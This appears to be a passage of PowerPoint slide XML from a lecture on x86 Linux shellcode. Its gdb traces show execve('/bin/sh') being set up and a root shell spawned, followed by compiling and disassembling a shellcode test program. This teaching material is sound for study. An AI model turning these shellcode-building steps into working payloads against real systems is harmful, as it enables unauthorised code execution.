            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/20x $esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe630:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" b="1"/>
              <a:t>0x0808ef88      0xbfffe640      0x00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>      0x080480c9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe640:     0x0808ef88      0x00000000      0xbfffe858      0x080483f3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe650:     0x00000001      0xbfffe884      0xbfffe88c      0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe660:     0x00000000      0x00000000      0x00000003      0xbfffe6f2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe670:     0x756e694c      0x00000078      0x00000000      0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass __execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function execve:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f0 &lt;execve+0&gt;:  push   %ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f1 &lt;execve+1&gt;:  mov    $0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f6 &lt;execve+6&gt;:  mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9f8 &lt;execve+8&gt;:  test   %eax,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9fa &lt;execve+10&gt;: push   %edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9fb &lt;execve+11&gt;: push   %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9fc &lt;execve+12&gt;: mov    0x8(%ebp),%edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9ff &lt;execve+15&gt;: je     0x804da06 &lt;execve+22&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da01 &lt;execve+17&gt;: call   0x0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da06 &lt;execve+22&gt;: mov    0xc(%ebp),%ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da09 &lt;execve+25&gt;: mov    0x10(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da0c &lt;execve+28&gt;: push   %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da0d &lt;execve+29&gt;: mov    %edi,%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da0f &lt;execve+31&gt;: mov    $0xb,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da14 &lt;execve+36&gt;: int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da16 &lt;execve+38&gt;: pop    %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da17 &lt;execve+39&gt;: cmp    $0xfffff000,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da1c &lt;execve+44&gt;: mov    %eax,%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da1e &lt;execve+46&gt;: ja     0x804da26 &lt;execve+54&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da20 &lt;execve+48&gt;: mov    %ebx,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da22 &lt;execve+50&gt;: pop    %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da23 &lt;execve+51&gt;: pop    %edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da24 &lt;execve+52&gt;: leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da25 &lt;execve+53&gt;: ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da26 &lt;execve+54&gt;: neg    %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da28 &lt;execve+56&gt;: call   0x80485fc &lt;__errno_location&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da2d &lt;execve+61&gt;: mov    %ebx,(%eax)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da2f &lt;execve+63&gt;: mov    $0xffffffff,%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da34 &lt;execve+68&gt;: jmp    0x804da20 &lt;execve+48&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da36 &lt;execve+70&gt;: nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da37 &lt;execve+71&gt;: nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) b *0x0804da14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 2 at 0x804da14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Continuing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 2, 0x0804da14 in execve ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x804da14 &lt;execve+36&gt;:      int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/i $pc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x804da14 &lt;execve+36&gt;:  int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) i reg $eax $ebx $ecx $edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>eax            0xb      11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ebx            0x808ef88        134803336</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ecx            0xbfffe640       -1073748416</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>edx            0x0      0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/s 0x808ef88</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x808ef88 &lt;_IO_stdin_used+4&gt;:    "/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/2x 0xbfffe640</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe640:     0x0808ef88      0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Continuing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Program exited normally.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8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B87A39-B3DF-4E19-B397-9B5316E865F4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gcc -o shellcode_asm shellcode_asm.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# ./shellcode_asm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# objdump -d shellcode_asm | more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>080482f4 &lt;main&gt;:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f4:       55                      push   %ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f5:       89 e5                   mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f7:       83 ec 08                sub    $0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
